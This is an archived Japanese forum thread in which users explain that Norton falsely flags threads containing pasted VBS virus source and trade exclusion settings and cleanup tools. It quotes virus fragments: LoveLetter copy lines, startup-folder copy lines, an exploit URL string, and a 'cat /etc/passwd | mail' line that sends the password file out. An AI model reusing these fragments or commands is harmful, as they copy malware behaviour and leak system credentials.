◎正当な理由による書き込みの削除について: 生島英之 とみられる方へ:ノートンがvbsウィルスのソースに誤反応3->画像>6枚
動画、画像抽出 ||
この掲示板へ
類似スレ
掲示板一覧 人気スレ 動画人気順
このスレへの固定リンク: http://5chb.net/r/pcqa/1109609938/ ヒント: http ://xxxx.5chb .net/xxxx のようにb を入れるだけでここでスレ保存、閲覧できます。
只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。
■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。
■まとめと対策■
2ちゃんねる見ていたらvbsウィルスが検出された!
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12 2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08 2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
前スレ
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/ ノートンがvbsウィルスのソースに誤反応2
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/ テンプレ
>>1-10 あたり
■既知のvbsウィルスのソース■
・VBS.Internal
出元は
http://tmp.2ch.net/test/read.cgi/download/1025717301/197 だと思われる。
ダウソ板からいろんな板へ飛び火した模様。
・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)出元不明。ニュー速から?
一般論として「htm」「html」拡張子などを安易に検索対象から外すことは奨励されません。これを感染ターゲットにするウィルスが数種確認されています。
http://www.symantec.com/region/jp/sarcj/data/v/vbs.internal.html Q.ウイルスコードが貼られているのにノートン反応しない。。。
A.ウイルスコードが貼られている2ちゃんねるのスレをテストページとして使用するのは奨励されない。
なぜなら、ここで言われているノートンの反応は単なる掲示板とスキャンエンジンの「仕様の衝突」であり、
これからも同じページを見ればその都度反応するという保証がないから。
仕様というものは、ある時突然変更されたりするもの。
ネットサーフィン中のウイルス対策ソフトの常駐動作確認は、テスト用に作られたEICARテストファイルにアクセスして行うべき。
EICARテストファイル(正常に常駐していればURLにアクセスと同時に反応します)
http://www.eicar.org/download/eicar.com.txt / ̄|
Q.2ちゃんねるの板開いただけで反応します。
A.スレッドタイトルにウイルスコードが貼られていることがあり、それに反応しています。
2ちゃんねるブラウザの場合、ログ保存フォルダの他にスレタイ・既読スレ履歴等を保存しているファイルやフォルダを除外。
各2ちゃんねるブラウザによってスレタイ・既読スレ履歴等を保存しているファイルやフォルダが異なるようなので
特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7 ↑を参考にお使いの2ちゃんねるブラウザのスレでお聞きください。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08 ◆◇◆ 報告用テンプレ ◆◇◆ (暫定) >>1-9 を読みましたか? 『YES/NO』 2ちゃんねるに貼られたウイルスコードに誤反応していたことがわかったら
インターネットエクスプローラの場合
ツール→インターネットオプション→インターネット一時ファイル、ファイルの削除
これをしないでウイルススキャンしたらインターネット一時ファイル(Temporary Internet Filesフォルダ)でウイルス反応がでます。
また、該当レスを再び読み込むとウイルス反応がでます。
2ちゃんねるブラウザを使って以下の設定をして2ちゃんねるを見ましょう。
2ちゃんねるブラウザの場合
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08 2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
よろ
DAT落ち阻止て神戸♪
>>13 VBS.LoveLetter.Var
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/928 ウイルスコードが貼られているのにノートン反応しないって人は
>>2 見てね。
ありがとう
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail
[email protected] If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
↑こういうのって最初に気づいた奴って天才だよな
あ。そうそう。
>>16 みたいなスクリプトを誤反応しないような、datファイルに
datを作り変えるプログラム作ってみました。
よかったら使ってみてください。
http://www.geocities.jp/cen_hp/index.html >>18 自分のパソコンで何度も実行してますが、大丈夫ですよー。
さっき総質で見た、未対応のスクリプトに対応させました。
==================================
未だにVIPの板更新すると、ノートン先生の逆鱗に触れてしまうオイラですが
>>24 スレタイにウィルスコードが書いてある模様。
>>24 漏れもソレダ!!!
もう無視しまくりんぐwwwwwww
A Boneを使用してるのですが、PC初心者の上の「初心者の質問」板をクリックするだけで、ノートンがウイルスを検知してしまいます。
2ちゃんを普通に見ていただけなのにノートンから「ウィルス名は
/ ̄|
Open Janeをでスレを見てたらウィルスコードが張られてて
>>34 すみません。
なんだ、最近多いと思ってたがウィルスコードのせいだったのか。
Norton Anti Virusと使ってます。
>>38 NGワードに登録するんではなく
Norton Anti VirusのオプションのAuto-Protectと手動スキャンでログフォルダを除外に指定しる
>>39 いや、それはやってるんですけど、反応するんです。
多分、キャッシュフォルダの方も除外指定にしないとだめっぽいです。
でも、それはセキュリティー的によくないってどっかに書いてあったんで、
NGワードに登録したいんですけど、できないんでしょうか?
>>40 2ちゃんねるブラウザのログフォルダを除外にしても2ちゃんねるブラウザで閲覧中に反応するの?
>>41 そうです。Norton Anti VirusとLive2chの組み合わせでAnti Virusの設定で
Live2chのログフォルダは除外に設定してます。
でも、Live2chで見てるとUnix Penguinだけ反応します。
これはどうだ?
と思ったら、VBS.Network.Eとかいうのも反応しっちゃってるよwww
>>45 http://ex7.2ch.net/news4vip >>43 いや、間違えてないと思います。
なんか他のウイルスにも反応してる。。。Network.E。
>>50 いや、C\ProgramFiles\Live2ch\logになってるからあってると思います。
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
>>51 除外に設定する時にサブフォルダも含めるにチェック入れた?
チン ☆ チン ☆
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
画像板から誘導されてきました。
Norton Anti VirusのAuto-Protectと手動スキャンで壺フォルダを除外に指定しても、壺で閲覧中に反応します。
,:::-、 __
今まで書き込めなかったのはノートン先生の仕業だったのか
駆除も削除も出来ないんだけどほっといていいのですか?
すいません、ノートンAV2005なんですが、Janeのログを除外に設定したいんですが
大空寺あゆ親衛隊対策
∧ l'vヘ
ちゃんと2ch.netとAuto-Protectと手動スキャンで除外設定しましたが
>>72 >>71 初心者はテンプレ読んでも何を言っているのかが分からなかったりするので
こういう細かい解説、感謝します。
っていうか大空寺死んで欲しい。(´・ω・`)
>>77 透明あぼーんで存在を消し去りましょう。スッキリするよ
>>78 透明あぼーんではノートンの反応はおさまらなかったんです。
なにやらメール欄に変なものを書き込んでいるようで。
>>79 >>17 のを使うと、メール欄のものでも消し去ります。
>>79 >>71 の手順でノートンの誤反応を解消し、専ブラの透明あぼーんで
糞コテやウイルス厨を見えなくするって意味。
分かりにくくてスマソ
>>80 >>81 いろいろとありがとうございました。
あいつら(大空寺とかネオとか)どうにかならないもんですかね…
XPにはNorton AntiVirusインストールできたのに、98にはできない。
Live2chでUnixPenguinがうざい場合
あ、そうそう。
>>17 のプログラムを更新しましたです。
その他→脅威カテゴリでも「除外」が出てくるけどここは設定しなくていいの?
って、脅威カテゴリで何をしてくれるのかのかよくわからない。(NIS2005)
>>71 >>84 >(7)左側にある「Auto-Protect」をクリック
(7)左側にある「手動スキャン」をクリック ・・・じゃないのかな。
大体、「除外」する項目をAuto-Protectと手動スキャンで
cat /etc/passwd | mail nobody
>>89 見事にUnixPenguinと判定してくれた
>>84 Live2chでUnixPenguinがうざい場合
IEでうざい場合はどうすればよろしいのでしょうか?????
>>93 え???
ダメなんですか???
すみません・・・
初心者なもので・・・
詳しく教えていただけませんか・・・
>>94 ダメじゃないけど、専用ブラウザのほうがずっと便利。
どこまで読んだかわかるし、ログはずっと残せるし、
新着分だけダウンロードするから速いし、軽いし。
>>95 ありがとうございます。
勉強になりました。
今日はウイルスが出てかなりテンパりました(苦笑)
また明日からがんばります!
でしつこいんですが、
IEでうざい場合はどうすればよろしいのでしょうか?
>>96 IEの一時フォルダを除外すれば警告は出なくなるが、
ほかのサイトで感染してしまう。
勇気が無くて見られない画像解説スレ Part702
http://etc3.2ch.net/test/read.cgi/entrance/1116419123/ すいません、↑のスレッドをLive2chで開いただけで
発生源:C:\Documents and Settings\kousuke\Local Settings
\Temporary Internet Files\Content.IE5\MVAP076F\woid[1].jpg
Trojan Horse
とか出るんですけど、誤反応ですか?
vbsのウィルスコードと大空寺のメール蘭攻撃は
除外しているはずなんですが。
ありえないとは思いますがて開いただけで感染したんですか?
Trojan Horse
ウィルス名:
Trojan Horse
別名:
感染場所:
.EXE ファイル
>>98 そのファイルはjpgじゃなくて、exeということらしい。
誤反応ではなくて、本物。
スレを開いただけでは感染しないけど、
その画像ファイルをIEで開くと感染する可能性がある。
>>99 おそらく原因のレスは
http://etc3.2ch.net/test/read.cgi/entrance/1116419123/899- だと思いますが、これ画像そのものはクリックしてないんですが
ただスレッドを開いた瞬間ノートン先生が激しく怒ったス
ログを見ても
アクセスが拒否されました。
修復できませんでした。
としか出てません。
最新のウィルス定義ファイルを落とさないと駆除できないみたいですが、
これは最近のということでしょうか?
そして、今自分のPCにTemporary Internet Filesや
他の場所にウィルスが潜伏してるということはないんでしょうか?それを開くとアウツみたいな。
>>100 そこの899だよ。
でも、ノートンが隔離してるはず。
そうでなくても、IEの一時ファイルをクリアして、ごみ箱を空にするだけでいい。
>>101 レスサンクス
この.jpgブラクラは最近登場したんでしょうか
これからまた誤反応する人とかいっぱいでるんでしょうか
>>102 だから、誤反応じゃないって言ってるのに。
モノホン反応ですか、ノートン使ってる人は
あ、ノートン使ってても
>>104 Q.画像プレビューや画像ポップアップでアンチウィルスソフトが反応する事がある
A.画像プレビューも画像ポップアップもイメージタグで表示するだけなので、
仮にそれがウイルスだったとしても、あくまで画像として処理され、
ウイルスのコードが実行される事はないので安全。気にする事なし。
>>106 サンクス、どうもでした(=゚ω゚)ノシュ
ms-its:mhtml:file://c:\
>>109 誤反応
ただの文字列では何も出来ない。
すみません。初心者スレッドから誘導されてきました。
>>115 はい。検討します。これ↓
「Bloodhound.Exploit.6」ファイルを検疫項目の中から
右クリックで削除してもよいものでしょうか?
についてはどうでしょうか?
>>117 なるほど、そうですか。
どうもありがとうございました。
青空さんは山田砲撃たれたことないの
>>117 >114と同様の警告がでます。
どういったウイルスなのでしょうか。
http://tmp5.2ch.net/test/read.cgi/mog2/1116912441/ >>4 で拾ったようなのですが
スレ違いだったらごめんなさい。
先日脳豚先生が誤動作したんだけど、そんときに「Bloodhound.Exploit.6」
UnixPenguinと言う名のウィルスが5/6に感染していた事が先ほどわかり
誤反応???まじで?
とあるスレを見ようとするとノートン先生が反応します。
失礼します。
>>133 多分ウイルスに似たコードを載せている為にウイルスと誤認識して反応しているだけですよ。
なんだか
>>40 と同じ症状です。
症状というのは【Unix Penguin】というウイルスコードが最近になって反応するようになりました。
専ブラのフォルダはサブフォルダ含めてAuto-Protectと手動スキャンの除外項目に確実に入っています。
その為、その場所は反応しないのですが一時ファイル(キャッシュ)の場所が反応しています。
一時フォルダも除外指定すれば簡単なんですけど、他のサイト閲覧する時とか
安置ウイルスの役割してくれないらしいので除外したくありません。
今まで一時ファイルは反応しなかったのに今更反応するのが、どうしてなのか分かりません。
専ブラはJANE使用。Norton AntiVirusは10.0.10.13gバージョン使用。
因みにOSはXPのHOMEです。アドバイスおねがいします。
>>134 レスありがとうございます。
Auto-Protectでひっかかるんですが
>>39 を読むと除外でも
問題なさそうですね・・・?大丈夫かな。
ただ
>>135 を読むと除外もよくないみたいでどうしたらいいのかとも思う。
>>135 > なんだか
>>40 と同じ症状です。
> 症状というのは【Unix Penguin】というウイルスコードが最近になって反応するようになりました。
> 専ブラのフォルダはサブフォルダ含めてAuto-Protectと手動スキャンの除外項目に確実に入っています。
スレッドタイトルに反応したんじゃないかな。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08 Janeの場合はfavorites.dat
ε三(; ・∀・)鯖マデオツカイの場合result.datを除外に加えてね。
> その為、その場所は反応しないのですが一時ファイル(キャッシュ)の場所が反応しています。
> 一時フォルダも除外指定すれば簡単なんですけど、他のサイト閲覧する時とか
> 安置ウイルスの役割してくれないらしいので除外したくありません。
> 今まで一時ファイルは反応しなかったのに今更反応するのが、どうしてなのか分かりません。
> 専ブラはJANE使用。Norton AntiVirusは10.0.10.13gバージョン使用。
> 因みにOSはXPのHOMEです。アドバイスおねがいします。
ブラウザでスレを開いたんじゃないかな。
>>10 で一時ファイルの削除の仕方があるので見てね。
>>136 IEの一時ファイルを除外にしないで
2ちゃんねるブラウザのログフォルダを除外にしてください。
>>135 >>136 2ちゃんねるブラウザのより細かい設定はそれぞれの2ちゃんねるブラウザのスレで確認してね。
ソフトウェア
http://pc8.2ch.net/software/ 初歩的な質問なんですが教えてもらえませんか?
>>138 ノートンは、ごく一部の文字列がファイルに含まれてるだけでウイルスと診断してるから。
判定の手抜きと言っていい。
もちろん、2ちゃんのログがウイルスとして機能する可能性は皆無。
>>140 レスありがとう
それにしてもこんなイタズラいったい誰が・・・
>>131 まったく同じような症状がでます。
自分はブラウザをjaneを使っているんですが、
ノートンのオンラインスキャンをすると、
C:...\openjanedoe-0.1.11.0\Logs\2ch\ネット関係\セキュリティ\数字.dat は
MHTMLRedir.Exploit に感染しています
と出ます。何度やっても。
これは感染しているのか?それとも誤反応なのか?
物凄い不安です。ノートン以外では反応しないので。
>>142 >>17 のでdatのスクリプトを無効化してみるといいかもです。
除外をログフォルダだけじゃなく、C\ProgramFile\Live2chにしたんだけど
わぁ、それらしいレスの内容をメモ帳に貼り付けて保存した瞬間、ノートン先生に持ってかれちゃったよぅ!
ノートパソコンなんですが、キーボードの隙間にゴミが入ってキーが押しにくくなって困る
パソコンの電源入れると最初にseeqという検索サイトが出る
>>151 スレ違いだけど、システムの復元で直前の日付に戻せ。
スレ違いですか、すみません。パソコン初心者なん
最近また急激に増えたな。
OSが2000なんですけど… 復元できないみたいです
読みます!
>>161 基本的には、リカバリで買った時と同じ状態になる。
従って、データは全部消えるので、気をつけて。
ありがとうございました!
今度はデータのバックアップについて勉強しないといけなそうですね。
ちなみに何の広告なんですかねこれ↓
http://adserver.sharewareonline.com/AdServer/RegClean/Exact/landing_EAL.htm ダウンロードしろって感じで頻繁に表示されるんです
スミマセン。他のスレから誘導されてきました。
>>166 あの。。。いろいろみましたけど専門用語ばかりでよくわかりません。
半年ROMはすでに経験墨です。
できたら詳細も教えていただきたいのですが。
普通に感染されてました。。。
http://sakura01.bbspink.com/test/read.cgi/ascii/1118577161/ ここのウイルスコードで出来たスレタイをクリックしてから、
すべての板で書き込むたびに誤作動をおこします・・・・
それでここへたどりついたのですが、
>NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
これって具体的にどうすればいいのでしょうか?
・オートプロテクト
・除外
・除外する項目
とまでは出来たのですが、最後の「除外する項目」に何かを入れるのですか?
それとも項目を削除するのですか?
何を入れたらいいのか、何を削除すればいいのか教えてください・・・。
今現在の項目はこの3つです
*.dbx
*.nch
*.sysutem volume information
ライブ2ちゃん使用です。
>>172 よければ手順を・・・・まったく意味が分かりません・・・・
>>7 を参考に、
Cドライブ→プログラム→ライブ2ちゃん→ログ
とういう感じでログをノートンの除外に選択したら、半角板を開いただけでノートンが反応することはなくなりました。
しかし、すべての板で書き込むたびにノートンが反応するっていうのは直りません。
どうすればいいですか?
「kakikomi」というのも除外に選択したらなおりました。おさがわせいたしました。
>>171-176 乙
ノートントラップ
http://ansitu.xrea.jp/guidance/?Trap#NortonTrap Q8.2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://ansitu.xrea.jp/guidance/?NortonInternetSecurity#faq08 ※スレタイがノートントラップのスレに書き込んだ場合、書き込み履歴も反応します。
2chWikiは申請中。
ノートンがvbsウィルスのソースに誤反応、
>>175 ウイルスを書き込んだのですか、ああ、そうですか。
>>176 ご回答ありがとうございます!助かりました(←大馬鹿)!
>>170 詳しく。
漏れも同じ症状でビビってる。
脳豚を入れているユーザは2ちゃんを見ないようにしてください。
ウィルス注意↑
これ多分ウィルスですが、貼られたスレッドを開いただけでノートン反応します
これも
>>98 同様、誤反応ですよね?
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
http://pc8.2ch.net/test/read.cgi/sec/1118586631/5 Q. 2chのスレを2chブラウザで開くと、ウイルスを検出するんだけど
A. avast!はノートンと同じく、ウイルスコードも検出する。
ただのテキストのコードなのでウイルスに感染することはない悪戯行為だから気にしないで大丈夫。
誤検出しないようにするには、以下の2通りの方法がある。
・avast!の標準シールドの感度を [普通] に設定 or avast!の標準シールドの例外設定に2chブラウザのdatフォルダを設定
・2chブラウザでWebシールドを使わないように設定
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12 >>189 それだけではわかりません。
そのようなリンクを貼られるようなスレではノートントラップも貼られていたのかもしれませんし、
あなたがリンク(他にも同様な悪意あるリンク)を踏んでいて反応したのかも
(2ちゃんねるブラウザによっては画像サムネイル機能が働いて画像ファイルに偽装されたウイルスに反応することがあります。・・・正常な反応です。)
リンクを不用意に踏まないことも肝心です。
>>4 尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
http://find.2ch.net/?STR=%CD%A6%B5%A4%A4%AC%CC%B5%A4%AF%A4%C6+%B2%F2%C0%E2%A5%B9%A5%EC&COUNT=50&TYPE=TITLE&BBS=ALL ひろゆきは2ch総合案内に対処法載せてくれないの?
>>192 そんなこと書かなくても、根本的に対策できるのに3年以上放置。
ノートンも放置。
そんなもんさ。
サイトの問題ではなくて、ノートンとそのユーザーの問題だからでしょ。
ニュース速報みてたらノートン先生が激怒しました!今、スキャン中何かすごい不安
まぁ今危ぶまれている年間自殺者3万人なんていうのもさぁ
>>192 ひろゆきは初心者大嫌い
ひっかかって嘆くユーザーをみてニヤニヤしてます
それが嫌なら来るなって考え
先生が反応しBloodhound.Exploit.6が出現!
>>201 前にそれありましたけど。(当方Jane Doe Style)
反応した部分の過去ログ捨てたら何も問題なかったですよ。
>>201 それはログのウイルスコードに反応してるだけだからむっしっし
ノートン先生がunix.Penguinに誤反応してしまって
>>208-209 どういうこと?新verにウィルスが入ってたの?
>>207 コレはジョーダンのつもり?シャレんなんないでしょ
c.Copy(dirsystem&"LOVE-LETTER-FOR-YOU.TXT.vbs
移動してきました、度々すいません。半角文字列板のスレを開いたらウイルス警告が出ました。
追記
すいません読み返しました。
>>220 有り得ない。
ノートンの手抜きチェックが悪い。
わかりました。ありがとう御座います。
Bloodhound.Exploit.6ってのが頻繁に検出される。
>>217 おいらも同様の症状なのですが、どうなんでしょうか?
シマンテックのオンラインスキャンをすると、
そうそう。
>>17 のソフトをアップデートしましたので、よかったら
ダウンロードをしてくださいです。
http://www.geocities.jp/cen_hp/index.html パソコン初心者総合質問スレッド vol.1072
http://pc8.2ch.net/test/read.cgi/pcqa/1120581493/ 399 名前:299[] 投稿日:2005/07/06(水) 21:47:49 ID:YFmNomOu
★症状: 以前までは出来ていた、PCでのDVD-Video再生が出来なくなった。
★試したソフト: Media Player Classic , Mediaunite , Windows Media Player 10
★関係有りそうな出来事: DirectShow Filterに「GPL MPEG-1/2 Decoder」を追加した。
何方か原因解りませんか?
せめてハードかソフト、どちらに原因がありそうかだけでも解れば幸いです。
405 名前:ひよこ名無しさん[sage] 投稿日:2005/07/06(水) 21:50:29 ID:???
>>399 ハードかソフトに原因
408 名前:cen ◆Pm9xOTJuM. [sage] 投稿日:2005/07/06(水) 21:52:09 ID:??? ?##
>>405 あと人間
411 名前:ひよこ名無しさん[sage] 投稿日:2005/07/06(水) 21:53:30 ID:???
>>408 暴言ヒドスw
初心者の質問のところから誘導されてきました。以下にそのままコピペします。
>>240 ああほんとだ!
すみません、慌ててました……
>>241 でも、表示のみ消えた「お気に入り」については、どこかに書いてありますか?
ノートンとは関係ないのかもしれないですが…。
>>243 関係ない。
インターネットオプション→詳細設定→使用してないフォルダは閉じる
ありがとうございます。
ノートンアンチウィルス2005、open jane Doe 0.1.12.2 を使っています。
該当スレのログを除外しようとしたのですが、スレッドのidxはあるのですが、datがそのスレッドに限って見つからず、改善できません。
スレッドは
http://society3.2ch.net/test/read.cgi/koumei/1121522102/11 このメール欄にウィルスコードが貼ってあるのです。
対処の方法を御教示願います。
すみません、自己解決しました。
【Live2ch 】 1.10
ほう・・・騙されてねぇ〜 http://www.loadcash.biz//adverts//35//main.chm::/main.htm "?type="text/? よく分からんけど、結局、感染してたとしても放っときゃいいんだろ?
Aya の自作自演 http://pc.2ch.net/test/read.cgi/pcqa/1021802095/837-846 >>837 >>837 >>839 うちのノートン2004、除外の設定するときフォルダ検索をしないとできない。
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
んなもん貼っても反応しねーよ
>>257 他のスレでこういうのが貼ってあり、かちゅを閉じたら
IEが全く見られなくなってしまいました
>>10 をやってみたのですが、やっぱり見れない
今生きてるのはかちゅだけです。助けてください
>>259 ノートンが原因だったら以下コピペ
2003/2004(2005もこれだと思う)
Norton Internet Security もしくは Norton Personal Firewall を起動する。
画面中央の [ファイアウォール] をクリックする。
右下に表示される [設定] ボタンをクリックする。
[プログラム制御] タブをクリックする。
[追加] ボタンをクリックする。
「プログラムの選択」ウィンドウが開きます。
Internet Explorer フォルダを開く。
Internet Explorer フォルダは今回の例の場合です。
お客様が設定を行いたいアプリケーションがインストールされているフォルダを開いてください。
IEXPLORE.EXE をクリックして選択する。
IEXPLORE.EXE は今回の例の場合です。
お客様が設定を行いたいアプリケーションを選択してください。
[開く] ボタンをクリックする。
例としてご案内している Internet Explorer を含め、設定がすでに作成されているアプリケーションの場合は「すでにルールがあるプログラムを追加しようとしています」というメッセージが表示されますが、まだ設定されていないアプリケーションの場合は表示されません。
「プログラム制御」のウィンドウが表示されるので、「どう処理しますか?」の部分で [許可] もしくは [遮断] などを選択して、[OK] ボタンをクリックする。
「アプリケーションカテゴリの選択」ウィンドウが表示されるので、そのアプリケーションをどのカテゴリとして分類するかどうかを選択し、[OK] ボタンをクリックする。
2002
NISをたちあげ、ファイアウォール→インターネットアクセス制御(アプリケーション制御の一覧)で設定が変えられます
IE5の修復は以下コピペ
1. [スタート]−[設定]−[コントロールパネル] から「アプリケーションの追加と削除」を起動します。
2. [インストールと削除] タブをクリックし、「Microsoft Internet Explore 5 とインターネットツール」をクリックします。
3. 「追加と削除」ボタンをクリックし、表示されるメニューから「Internet Explore を修復する」を選択して「OK」をクリックします。
XPならシステムの復元
ノートンアンインストールしてウィルスバスター入れました
そうそう。
>>17 のソフトですが、シリア語ブラクラにも対応しました。
あと、何日前以降に更新されたファイルのみ検索の設定ができるように
なりましたです。
http://www.geocities.jp/cen_hp/index.html >>271 単にウイルス検出対象ファイルからhtm、html、datを外せば済むことなのに…
まあ少しでもお金使って貰わないとカネの巡りが悪くなるからな。
って、htmとhtmlは外すとまずいのか。
>>273 乙です。
壺のdatファイルなんですが、ノートンで誤反応のファイルが見つかったのに
vicptdel.exeで検索したら0個だったんですがまだ対応されてないだけでしょうか?
VBS.LoveLetter.Varとでてましたが。
>>277 どうもです。
今のところ、壺のdatファイルには対応しておりません。
対応しているのは、2chに直接置いてあるdatだけです。
この板なら、
http://pc8.2ch.net/pcqa/dat/xxxxxxxxx.dat のような
datファイルのみです。
壺のdatファイルは構造が違うので、datファイルの構造のチェックで
弾いてしまう仕組みになっています。
>>278 分かりました。素早いレスどうもありがとう。
このスレ開いたらノートンが反応するんだけどどうすればいいですか?
>>281 俺はな、このスレを最初から読んで欲しくて誘導したんだ
過去レスを一切読まずに質問するな
Open Jane Doe α 0.1.12.2です
NIS2004/2003はNorton AntiVirusのオプションで手動スキャンと
>>285-286 > Norton AntiVirus Auto-Protect
> ファイル C:\...orary Internet
> Files\Content.IE5CLIVSTUF\subback[32].html を修復できません。
> このファイルは Unix.Penguin ウイルスにまだ感染しています。
IEのキャッシュですね。
>>286 で一時ファイルを削除しても反応するのは
IEでまた該当スレを開いたのではないのでしょうか。
ノートントラップの回避方法は2ちゃんねるブラウザで
>>1 の設定をして
2ちゃんねるをみてください。
Janeの設定も今一度確認してください。
ギコナビ使ってます。ノートンが反応してから見れないスレなどあります。
>>10 にある方法で解決するんだと思うのですが、
除外してしまって問題あることはないですか?
画像のプレビューとか出ますけど、そういうのに何かまずいものがあったとき困るとか・・。
まったく見当違いな心配かもしれませんが、
よくわからないので教えてください。
>>289 IEエンジン使ってないJane DOE系の2chブラウザにしろよ
画像に何か仕込んでどうこうってのはIEの脆弱性を狙うから
>>289 非IE系専ブラのログなら除外しても問題ない。
ギコは知らん。
IEがトラブっても使える非IE系のほうが何かと便利。
>>290-291 ありがとうございます。他の専ブラ検討してみます。
>>289 ギコナビで画像プレビューした場合、画像はIEのキャッシュのほうに保存される。
なのでログフォルダを除外してしまってもその点で問題あることはない。
物凄い今更でどうでもいいけど気になったので。
>>51 間違ってるじゃないか
C\ProgramFiles\Live2ch\log→C:\Program Files\Live2ch\log
「:」と「 」が足りない。
>1〜10を読んでノートンの除外設定をしようとしているのですが、
>>299 http://ansitu.xrea.jp/guidance/?NortonInternetSecurity#faq08 http://ansitu.xrea.jp/guidance/?Trap#NortonTrap 以下を一行ずつコピー、除外項目でCtrl+V
C:\Program Files\gikoNavi\Log
C:\Program Files\gikoNavi\config\History.xml
C:\Program Files\gikoNavi\config\Favorite.xml
C:\Program Files\gikoNavi\sent.ini
より詳しい除外項目はこちらで今一度確認してください。
2ちゃんねる用ブラウザ「ギコナビ」 Part31
http://pc7.2ch.net/test/read.cgi/software/1124859118/1-12 (テンプレと直近50スレは読んでね)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
本当にひどいですね。まだ、あざむいて謀略するんですね
人類と違う第六感が無い人の事が、仔(赤ちゃん)
そうかだから第六感が無い人「仔(赤ちゃん)」たちの
http://news19.2ch.net/test/read.cgi/news/1128874250/ これ↑ってウイルスですか?
開いたらノートン先生が反応したんですけどつД`)
Mac OS10.3 IEmac5.2 です
検疫に引っかかったファイルがあり状態は感染でした
>>306 レスの中にウィルスのような動作をするスクリプトの一部が含まれています。
あくまで一部ですし、Windows向けに作成されたものだし、スクリプトを実行する現実的な方法も
存在しないので、被害を受けることは絶対にありません。
このように危険のない対象までウィルスとして感染警告するのはノートンの仕様です。
そういったノートンの挙動を悪用した悪戯なので気にしないでください。
